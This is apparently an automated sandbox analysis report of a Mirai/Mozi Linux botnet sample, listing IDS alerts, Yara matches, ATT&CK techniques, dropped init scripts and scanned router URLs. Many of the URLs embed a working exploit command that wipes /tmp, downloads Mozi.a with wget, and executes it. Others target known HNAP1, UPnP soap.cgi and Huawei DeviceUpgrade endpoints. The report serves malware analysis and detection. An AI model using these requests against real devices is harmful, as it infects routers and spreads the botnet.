Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)

Yara detected Mirai

Source: Yara match	File source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: bin.sh.elf, type: SAMPLE
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: 6242.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bin.sh.elf PID: 6242, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bin.sh.elf PID: 6240, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	3 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	3 Scripting	Boot or Logon Initialization Scripts	1 Hide Artifacts	1 Brute Force	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bin.sh.elf	66%	ReversingLabs	Linux.Trojan.Mirai
bin.sh.elf	100%	Avira	EXP/ELF.Mirai.O

Dropped Files

Source	Detection	Scanner	Label
/usr/networks	100%	Avira	EXP/ELF.Mirai.O
/etc/init.d/S95baby.sh	0%	ReversingLabs
/etc/rcS.d/S95baby.sh	0%	ReversingLabs
/usr/networks	66%	ReversingLabs	Linux.Trojan.Mirai

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://186.63.148.222:80/HNAP1/	0%	Avira URL Cloud	safe
http://158.171.104.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://155.6.109.17:80/HNAP1/	0%	Avira URL Cloud	safe
http://157.209.190.23:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://158.22.222.94:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://210.2.75.78:80/HNAP1/	0%	Avira URL Cloud	safe
http://128.160.247.151:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://58.208.230.98:80/HNAP1/	0%	Avira URL Cloud	safe
http://157.246.210.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://166.48.28.230:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://214.39.222.231:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://78.174.112.194:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://195.215.15.36:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://82.182.64.86:80/HNAP1/	0%	Avira URL Cloud	safe
http://1.145.88.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://8.59.167.66:80/HNAP1/	0%	Avira URL Cloud	safe
http://169.102.92.231:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://84.108.181.121:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://204.114.138.144:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://93.50.135.175:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://57.86.125.106:80/HNAP1/	0%	Avira URL Cloud	safe
http://165.42.160.13:80/HNAP1/	0%	Avira URL Cloud	safe
http://75.128.231.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://211.75.126.69:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://20.189.75.252:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://90.217.106.121:80/HNAP1/	0%	Avira URL Cloud	safe
http://84.48.173.191:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://39.29.53.94:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://199.231.185.52:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://182.155.232.129:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://82.247.4.104:80/HNAP1/	0%	Avira URL Cloud	safe
http://220.208.144.34:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://42.76.206.69:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://134.97.14.34:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://99.94.203.155:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://180.57.56.71:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://181.20.68.245:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://74.58.189.101:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://62.13.179.175:80/HNAP1/	0%	Avira URL Cloud	safe
http://11.229.114.210:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://72.134.146.85:80/HNAP1/	0%	Avira URL Cloud	safe
http://103.215.183.237:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://78.111.154.190:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://49.18.1.208:80/HNAP1/	0%	Avira URL Cloud	safe
http://106.126.135.113:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://135.158.93.91:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://73.77.168.19:80/HNAP1/	0%	Avira URL Cloud	safe
http://151.201.119.114:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://22.249.87.53:80/HNAP1/	0%	Avira URL Cloud	safe
http://134.87.142.186:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://29.90.152.126:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://217.15.207.28:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://187.109.155.118:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://176.67.30.177:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://53.126.136.182:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://192.252.242.222:80/HNAP1/	0%	Avira URL Cloud	safe
http://36.64.74.203:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://202.178.119.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://186.220.42.0:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://163.197.220.203:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://www.alsa-project.org.	0%	Avira URL Cloud	safe
http://160.79.59.90:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://220.157.8.218:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://161.142.203.178:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://121.41.156.213:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://86.1.241.8:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://220.213.171.152:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://110.177.183.23:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://152.249.241.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://211.52.34.202:80/HNAP1/	0%	Avira URL Cloud	safe
http://90.6.70.177:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://99.219.59.203:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://146.249.197.42:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://117.201.100.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://39.167.82.235:80/HNAP1/	0%	Avira URL Cloud	safe
http://4.222.236.14:80/HNAP1/	0%	Avira URL Cloud	safe
http://149.239.18.173:80/HNAP1/	0%	Avira URL Cloud	safe
http://53.189.162.142:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://14.91.101.35:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://204.181.118.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://155.65.230.109:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://13.1.80.75:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://125.200.222.101:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://69.229.221.117:80/HNAP1/	0%	Avira URL Cloud	safe
http://177.200.207.58:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://139.39.140.82:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://207.148.48.191:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://179.212.119.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://123.154.158.173:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://196.103.201.163:80/HNAP1/	0%	Avira URL Cloud	safe
http://142.190.2.119:80/HNAP1/	0%	Avira URL Cloud	safe
http://211.138.21.19:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://191.42.122.94:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://63.164.155.1:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://48.128.115.213:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://67.28.77.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://68.148.176.5:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://159.88.243.196:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://139.35.76.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dht.transmissionbt.com	212.129.33.59	true	false	high
router.bittorrent.com	unknown	unknown	false	high
bttracker.debian.org	unknown	unknown	false	high
router.utorrent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://210.2.75.78:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://128.160.247.151:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://186.63.148.222:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://158.22.222.94:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://157.209.190.23:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://155.6.109.17:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://158.171.104.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://166.48.28.230:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://157.246.210.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://58.208.230.98:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://204.114.138.144:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://214.39.222.231:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://82.182.64.86:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://78.174.112.194:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://195.215.15.36:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://1.145.88.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://169.102.92.231:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://84.108.181.121:37215/ctrlt/DeviceUpgrade_1	true	Avira URL Cloud: safe	unknown
http://8.59.167.66:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://93.50.135.175:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://75.128.231.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://57.86.125.106:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://211.75.126.69:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://165.42.160.13:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://20.189.75.252:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://90.217.106.121:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://199.231.185.52:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://84.48.173.191:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://39.29.53.94:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://182.155.232.129:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://82.247.4.104:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://220.208.144.34:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://42.76.206.69:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://134.97.14.34:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://62.13.179.175:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://99.94.203.155:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://180.57.56.71:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://181.20.68.245:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://74.58.189.101:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://11.229.114.210:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://72.134.146.85:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://73.77.168.19:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://78.111.154.190:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://103.215.183.237:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://106.126.135.113:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://49.18.1.208:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://135.158.93.91:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://151.201.119.114:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://22.249.87.53:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://134.87.142.186:37215/ctrlt/DeviceUpgrade_1	true	Avira URL Cloud: safe	unknown
http://29.90.152.126:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://187.109.155.118:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://217.15.207.28:37215/ctrlt/DeviceUpgrade_1	true	Avira URL Cloud: safe	unknown
http://192.252.242.222:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://176.67.30.177:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://53.126.136.182:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://36.64.74.203:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://202.178.119.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://186.220.42.0:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://163.197.220.203:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://160.79.59.90:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://220.157.8.218:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://161.142.203.178:49152/soap.cgi?service=WANIPConn1	true	Avira URL Cloud: safe	unknown
http://220.213.171.152:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://121.41.156.213:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://86.1.241.8:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://110.177.183.23:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://211.52.34.202:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://152.249.241.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown
http://90.6.70.177:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
